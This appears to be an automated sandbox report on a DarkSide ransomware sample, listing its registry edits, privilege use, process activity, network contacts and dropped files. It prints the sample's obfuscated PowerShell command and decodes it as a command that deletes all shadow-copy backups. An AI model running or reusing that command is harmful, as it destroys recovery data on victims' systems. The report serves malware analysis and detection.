Malware Analysis Report

2024-10-16 03:30

Sample ID: 220125-3cwwaahgd4
Target: mal.exe
SHA256: 2c7d10f64dc39ea9bd6f18d9d1e1204f0c62324e8da148354d557bba17e3c615
Tags: darkside ransomware spyware stealer
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 2c7d10f64dc39ea9bd6f18d9d1e1204f0c62324e8da148354d557bba17e3c615

Threat Level: Known bad

The file mal.exe was found to be: Known bad.

Malicious Activity Summary

darkside ransomware spyware stealer

DarkSide

Modifies extensions of user files

Reads user/profile data of web browsers

Sets desktop wallpaper using registry

Enumerates system info in registry

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Modifies Control Panel

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2022-01-25 23:22

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2022-01-25 23:22

Reported: 2022-01-25 23:27

Platform: win7-en-20211208

Max time kernel: 189s

Max time network: 194s

Command Line

"C:\Users\Admin\AppData\Local\Temp\mal.exe"

Signatures

DarkSide

ransomware darkside

Reads user/profile data of web browsers

spyware stealer

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3\ = "5bede5a3" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\5bede5a3.ico" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeIncreaseQuotaPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: 34 | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 968 wrote to memory of 1652 | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 1180 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1308 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1380 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\mal.exe

"C:\Users\Admin\AppData\Local\Temp\mal.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

(The hex string above decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} - a shadow copy deletion, which accounts for the vssvc.exe activity and the SeBackupPrivilege/SeRestorePrivilege token use recorded above.)

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feeeaf4f50,0x7feeeaf4f60,0x7feeeaf4f70

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1048 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1356 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1696 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1976 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1968 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3012 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2368 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3940 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3980 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3852 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3764 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3652 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3676 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3700 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3800 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4216 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4000 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=764 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3220 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3340 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2924 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2076 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2124 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2516 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3544 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2972 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2948 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=792 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4328 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3456 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 catsdegree.com udp
US 72.52.178.23:443 catsdegree.com tcp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.206:443 clients2.google.com tcp
NL 142.250.179.173:443 accounts.google.com tcp
US 8.8.8.8:53 edgedl.me.gvt1.com udp
US 34.104.35.123:80 edgedl.me.gvt1.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
NL 172.217.168.193:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
NL 142.251.39.110:443 tcp
NL 142.251.39.110:443 tcp
NL 142.251.39.110:443 tcp
NL 142.251.39.110:443 tcp
NL 142.251.39.110:443 tcp
NL 142.250.179.142:443 apis.google.com tcp
NL 31.13.64.35:443 tcp
NL 31.13.64.35:443 tcp
US 8.8.8.8:53 dns.google udp
US 157.240.27.27:443 tcp
US 157.240.27.27:443 tcp
US 157.240.27.27:443 tcp
US 157.240.27.27:443 tcp
US 157.240.27.27:443 tcp
US 157.240.27.27:443 tcp
US 157.240.27.27:443 tcp
NL 142.250.179.170:443 tcp
N/A 224.0.0.251:5353 udp
NL 142.251.39.110:443 udp
US 172.67.204.233:80 cyberdefenders.org tcp
US 172.67.204.233:80 tcp
US 172.67.204.233:443 cyberdefenders.org tcp
US 104.21.78.7:443 use.fontawesome.com tcp
US 8.8.8.8:443 dns.google udp
US 104.16.18.94:443 cdnjs.cloudflare.com tcp
NL 142.250.179.170:443 udp
NL 142.250.179.195:443 update.googleapis.com tcp
US 8.8.8.8:53 dns.google udp
US 34.104.35.123:80 edgedl.me.gvt1.com tcp
US 104.21.78.7:443 tcp
NL 142.250.179.131:443 beacons.gcp.gvt2.com tcp
NL 65.9.83.4:443 tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
NL 65.9.83.62:443 script.hotjar.com tcp
NL 65.9.83.22:443 vars.hotjar.com tcp
IE 52.209.125.250:443 tcp
IE 52.17.254.223:443 tcp
IE 52.17.254.223:443 tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
NL 142.250.179.195:443 udp
US 151.101.0.176:443 js.stripe.com tcp
US 8.8.8.8:53 dns.google udp
US 151.101.2.132:443 files.cdn.thinkific.com tcp
NL 65.9.83.24:443 m.stripe.network tcp
IE 52.17.254.223:443 tcp
US 34.211.243.235:443 tcp

Files

memory/968-54-0x0000000000400000-0x000000000083B000-memory.dmp

memory/968-55-0x00000000002F0000-0x0000000000314000-memory.dmp

memory/968-56-0x0000000000020000-0x0000000000030000-memory.dmp

memory/968-57-0x00000000754B1000-0x00000000754B3000-memory.dmp

memory/968-58-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1652-59-0x000007FEFB571000-0x000007FEFB573000-memory.dmp

memory/1652-61-0x0000000002920000-0x0000000002922000-memory.dmp

memory/1652-62-0x0000000002922000-0x0000000002924000-memory.dmp

memory/1652-63-0x0000000002924000-0x0000000002927000-memory.dmp

memory/1652-60-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp

memory/1652-64-0x000000001B770000-0x000000001BA6F000-memory.dmp

memory/1652-65-0x000000000292B000-0x000000000294A000-memory.dmp

\??\pipe\crashpad_1712_BRJFVGIFYYINHDUG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\5746a2d4-a368-477c-9a85-6a28ed74cf13.tmp

MD5 068343276d2982c18cbee0c88df9a673
SHA1 6ce874c11f1106580fba90d8611894be66de40e6
SHA256 9d1b4ab3a16f3f13c52db4fc3440cb181ad5807e4f07e1262d1a992d13bb8a41
SHA512 be3e17d860cb13babdfe16a8cd9e9983839241c01e48327e969459c871896cdb807df62b07fe892960db5feb8a64e8ea40903e7022b76067fbd9ba7af498b04e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 fe2713936e85049abd4456bf037d5c29
SHA1 81ea3f3ebb43d4099e21931522b0cfff51ebb4db
SHA256 01b16495da4e2fdf784fb84f78214fa96ab058d1e9f9dc1ea66924122f4c2b5c
SHA512 4fe3bfbd71c92c466182f6a77e078f4085ffe1ee26a3a4f05802ec3b4a92f39ea4ce6f990a555d130ed27ffc53b57b27cd4b7b967c6430252f86205c976e0135

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005

MD5 70ae354ce421c724f886e84c9e5bdbe6
SHA1 b1d130a83f58a34c86a18881276adb0181da23e7
SHA256 3fba20649c9805c920acacf297d0e2863eff51c3992925374d634c94781119ad
SHA512 ce20d7031a8e5d22839903d2fa9d0f357f2fc91d454c2be1878f461654d3b1623247affd8c29a44d6b6290b98e3933cf2e5b683ff473c38a605cad5281801b22

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004

